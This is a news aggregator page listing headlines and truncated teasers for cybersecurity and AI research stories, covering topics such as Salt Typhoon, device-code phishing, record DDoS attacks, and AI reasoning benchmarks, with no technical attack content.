Cybercrime, Cybersecurity, Exploits, Fortinet, Global Security News, ivanti, Palo Alto Networks, Research, Threats, vulnerabilities, vulnerability
Edge device vulnerabilities fueled attack sprees in 2024
Edge devices harboring zero-day and n-day vulnerabilities were linked to the most consequential attack campaigns last year, Darktrace said in an annual threat report released Wednesday. Darktrace’s threat researchers found the most frequent vulnerability exploits in customers’ instances of Ivanti Connect Secure and Ivanti Policy Secure appliances, along with firewall products from Fortinet and Palo…
AI, Benchmark, evergreens, Global IT News, Global Security News, NPR, Research
These researchers used NPR Sunday Puzzle questions to benchmark AI ‘reasoning’ models
Every Sunday, NPR host Will Shortz, The New York Times’ crossword puzzle guru, gets to quiz thousands of listeners in a long-running segment called the Sunday Puzzle. While written to be solvable without too much foreknowledge, the brainteasers are usually challenging even for skilled contestants. That’s why some experts think they’re a promising way to…
Cybersecurity, Exploits, Global Security News, Microsoft, phishing, Research, Russia, Threat Intelligence, Threats, Volexity
Threat researchers spot ‘device code’ phishing attacks targeting Microsoft accounts
Microsoft threat researchers discovered a series of what they are calling “device code” phishing attacks that allowed a suspected Russia-aligned threat group to gain access to and steal data from critical infrastructure organizations, the company said in research released Thursday. The group, which Microsoft tracks as Storm-2372, has targeted governments, IT services and organizations operating…
china, cisco, Cybersecurity, Exploits, Five Eyes, Global Security News, nation state threats, nation-state hackers, Recorded Future, Research, routers, Salt Typhoon, Threats, vulnerabilities
Salt Typhoon remains active, hits more telecom networks via Cisco routers
Salt Typhoon, the Chinese nation-state threat group linked to a spree of attacks on U.S. and global telecom providers, remains active in its intrusion and has hit multiple additional networks worldwide, including two in the United States, Recorded Future said in a report released Thursday. Recorded Future’s Insikt Group observed seven compromised Cisco network devices communicating…
CVE, Cybersecurity, Exploits, Global Security News, Microsoft, Microsoft Threat Intelligence Center, Research, Russia, Seashell Blizzard, Threats, Uncategorized, vulnerabilities
Russian state threat group shifts focus to US, UK targets
A subgroup of Seashell Blizzard has shifted its focus to targets in the U.S., Canada, Australia and the U.K. within the past year, expanding the scope of its malicious activity, Microsoft’s threat intelligence team said in a report released Wednesday. The initial-access operation, which Microsoft tracks as the “BadPilot campaign,” has allowed the Russian state…
AI, ChatGPT, Climate, energy consumption, energy usage, environment, environmental impact, epoch, epoch ai, Global IT News, Global Security News, openai, Research, study
ChatGPT may not be as power-hungry as once assumed
ChatGPT, OpenAI’s chatbot platform, may not be as power-hungry as once assumed. But its appetite largely depends on how ChatGPT is being used, and the AI models that are answering the queries, according to a new study. A recent analysis by Epoch AI, a nonprofit AI research institute, attempted to calculate how much energy a…
AI, Global IT News, Global Security News, Research
Is AI making us dumb?
Researchers from Microsoft and Carnegie Mellon University recently published a study looking at how using generative AI at work affects critical thinking skills. “Used improperly, technologies can and do result in the deterioration of cognitive faculties that ought to be preserved,” the paper states. When people rely on generative AI at work, their effort shifts…
AI, Artificial Intelligence, CISO, cyber security, Cybersecurity, GenAI, Global Security News, it teams, Research, Security, sophos, study
IT Teams Worry About Increasing Cost of Cyber Tools From AI Features, While Criminals Barely Use Them
Most IT leaders believe generative AI will increase the cost of their security tools, according to Sophos research. But, by the looks of cyber crime forums, hackers are barely using AI.
AI, Benchmark, Global IT News, Global Security News, NPR, npr sunday puzzle, Research, sunday puzzle
These researchers used NPR Sunday Puzzle questions to benchmark AI ‘reasoning’ models
Every Sunday, NPR host Will Shortz, The New York Times’ crossword puzzle guru, gets to quiz thousands of listeners in a long-running segment called the Sunday Puzzle. While written to be solvable without too much foreknowledge, the brainteasers are usually challenging even for skilled contestants. That’s why some experts think they’re a promising way to…
CVE, Cybersecurity, Exploits, Global Security News, MITRE, National Vulnerability Database, NIST, Research, Threats, vulnerabilities
Infosec pros: We need CVSS, warts and all
A key pillar of a strong cybersecurity program is identifying vulnerabilities in the complex mix of software programs, packages, apps, and snippets driving all activities across an organization’s digital infrastructure. At the heart of spotting and fixing these flaws is the widely used Common Vulnerability Scoring System (CVSS), maintained by a nonprofit called the Forum…
cloud computing, Cybersecurity, Cybersecurity and Infrastructure Security Agency (CISA), Exploits, Global Security News, open source, Research, S3 bucket, SSL, VPN gateway, watchTowr Labs
Here’s all the ways an abandoned cloud instance can cause security issues
There is a line of thought among the public that “the internet is forever.” A security company published research Tuesday that showed why “forever” can be a security nightmare. Over the course of four months, cybersecurity researchers at watchTowr monitored and ultimately took control of what they referred to as “abandoned” digital infrastructure, focusing on…
Cybercrime, Cybersecurity, Exploits, Global Security News, intezer, Research, Solis Security, Threats, VeraCore, XE Group, zero days
From credit card fraud to zero-day exploits: Xe Group expanding cybercriminal efforts
A cybercriminal organization that has been operating for over a decade has moved from credit-card skimming to exploiting zero-day vulnerabilities, according to a joint investigation by cybersecurity firms Solis Security and Intezer. The group, tracked as XE Group, now poses heightened risks to global supply chains, particularly in manufacturing and distribution sectors, by leveraging stealthier…
Blog, Exploits, Global Security News, Research, Security Bloggers Network
Hackers Hijack JFK File Release: Malware & Phishing Surge
Veriti Research has uncovered a potentially growing cyber threat campaign surrounding the release of the declassified JFK, RFK, and MLK files. Attackers are capitalizing on public interest in these historical documents to launch potential malware campaigns, phishing schemes, and exploit attempts. Our research indicates that cybercriminals are quick to react to major public events, and…
Cybersecurity, Exploits, firmware, Global Security News, Government, Innovation, Research, Technology
DARPA wants to create ‘self-healing’ firmware that can respond and recover from cyberattacks
Imagine, for a moment, that your network is hit with ransomware. One of your employees clicked on a malicious link and now your network is compromised, data is encrypted and most of the organization’s systems are locked or offline. Then imagine if instead of assembling an incident response team, notifying the board and contacting law…
AI, Cloud, Cybersecurity, Global IT News, Global Security News, Research, Technology, Threat Intelligence
Vulnerability in popular AI developer could ‘shut down essentially everything you own’
A popular platform for developing AI systems has patched an easily exploitable vulnerability that would have given an attacker remote code execution privileges. Researchers at application security firm Noma detail how the flaw, embedded in Javascript code for Lightning.AI’s development platform, could be manipulated to give an attacker virtually unfettered access to a user’s cloud…
Cybersecurity, endor labs, Global Security News, Jit, Kodem, Legit Security, Mobb, open source, OpenGrep, Orca Security, Research, security testing, Semgrep, Static Analysis, Technology
Open-source security spat leads companies to join forces for new tool
A conflux of open-source developers and application security companies has been embroiled in a complex debate after a recent change in the licensing policy of a widely used static code analysis tool, resulting in a faction of organizations creating a new, open-source rival. The issue started with a recent change in the licensing policy of…
AI, Global IT News, Global Security News, pressure, Research, researchers, stress
The AI industry’s pace has researchers stressed
To outside observers, AI researchers are in an enviable position. They’re sought after by tech giants. They’re taking home eye-popping salaries. And they’re in the hottest industry of the moment. But all this comes with intense pressure. More than half a dozen researchers TechCrunch spoke with, some of whom requested anonymity for fear of reprisals,…
Blog, Global Security News, Research, Security Bloggers Network
Japanese Companies Threatened by DPRK IT Workers
Nisos Japanese Companies Threatened by DPRK IT Workers The Japanese government warned domestic companies in March 2024 about contracting North Korean (DPRK) IT workers posing as Japanese nationals to earn cash, as it is suspected… The post Japanese Companies Threatened by DPRK IT Workers appeared first on Nisos by Nisos The post Japanese Companies Threatened…
AI, ChatGPT, DDoS, Exploits, Global Security News, openai, Research, Technology, Threats
‘Severe’ bug in ChatGPT’s API could be used to DDoS websites
A vulnerability in ChatGPT’s API can generate DDoS attacks against targeted websites, but the security researcher who discovered it says the flaw has since been addressed by OpenAI. In a security advisory posted to the developer platform GitHub, German security researcher Benjamin Flesch detailed the bug, which occurs when the API is processing HTTP POST…
CloudFlare, Cybersecurity, DDoS, Global Security News, Internet of Things (IoT), Mirai, Qualys, Research, Threats
CloudFlare detected (and blocked) the biggest DDoS attack on record
Web infrastructure and security company Cloudflare says it detected the biggest Distributed Denial-of-Service (DDoS) attack ever recorded, a 5.6 terabits per second (Tbps) attack directed at an internet service provider (ISP) in Eastern Asia. Despite the staggering volume of the attack, Cloudflare successfully managed and mitigated it without human intervention. The company said in research…
AI, Global IT News, Global Security News, hallucinations, LLMs, Research, TC
AI isn’t very good at history, new paper finds
Top LLMs performed poorly on a high-level history test, a new paper has found. © 2024 TechCrunch. All rights reserved. For personal use only.
Blog, Global Security News, Research, Security Bloggers Network
Trump’s Digital Footprint: Unveiling Malicious Campaigns Amid Political Milestones
As the political landscape heats up, so does the activity in the cyber threat domain. High-profile events such as inaugurations often become a prime opportunity for cybercriminals to launch malicious campaigns. With Trump’s upcoming inauguration on January 20th, our research sheds light on the digital threats tied to such politically charged events, focusing on previous…
Blog, Global Security News, Research, Security Bloggers Network
The Insider Threat Digital Recruitment Marketplace
Nisos The Insider Threat Digital Recruitment Marketplace Nisos routinely monitors mainstream and alternative social media platforms, as well as cloud-based messaging applications and dark web forums… The post The Insider Threat Digital Recruitment Marketplace appeared first on Nisos by Nisos The post The Insider Threat Digital Recruitment Marketplace appeared first on Security Boulevard.
AI, generative ai, Global IT News, Global Security News, open source, reasoning, Research, sky-t1
Researchers open source Sky-T1, a ‘reasoning’ AI model that can be trained for less than $450
So-called reasoning AI models are becoming easier — and cheaper — to develop. On Friday, NovaSky, a team of researchers based out of UC Berkeley’s Sky Computing Lab, released Sky-T1-32B-Preview, a reasoning model that’s competitive with an earlier version of OpenAI’s o1 on a number of key benchmarks. Sky-T1 appears to be the first truly…
2025, AI, AI and Machine Learning in Security, AI and ML in Security, Analytics & Intelligence, cyberattacks, Cybersecurity, General Intelligence, Global Security News, nation-states, openai, predictions, Research, Security Awareness, Security Boulevard (Original), Social - Facebook, Social - LinkedIn, Social - X, task force, Threat Intelligence
Beware the Rise of the Autonomous Cyber Attacker
AI’s growing sophistication signals a future in which networks can be compromised autonomously, and the industry must prepare for this near-term reality. The post Beware the Rise of the Autonomous Cyber Attacker appeared first on Security Boulevard.
AI, generative ai, Global IT News, Global Security News, Research, synthetic, synthetic data, Training
The promise and perils of synthetic data
Is it possible for an AI to be trained just on data generated by another AI? It might sound like a harebrained idea. But it’s one that’s been around for quite some time — and as new, real data is increasingly hard to come by, it’s been gaining traction. Anthropic used some synthetic data to…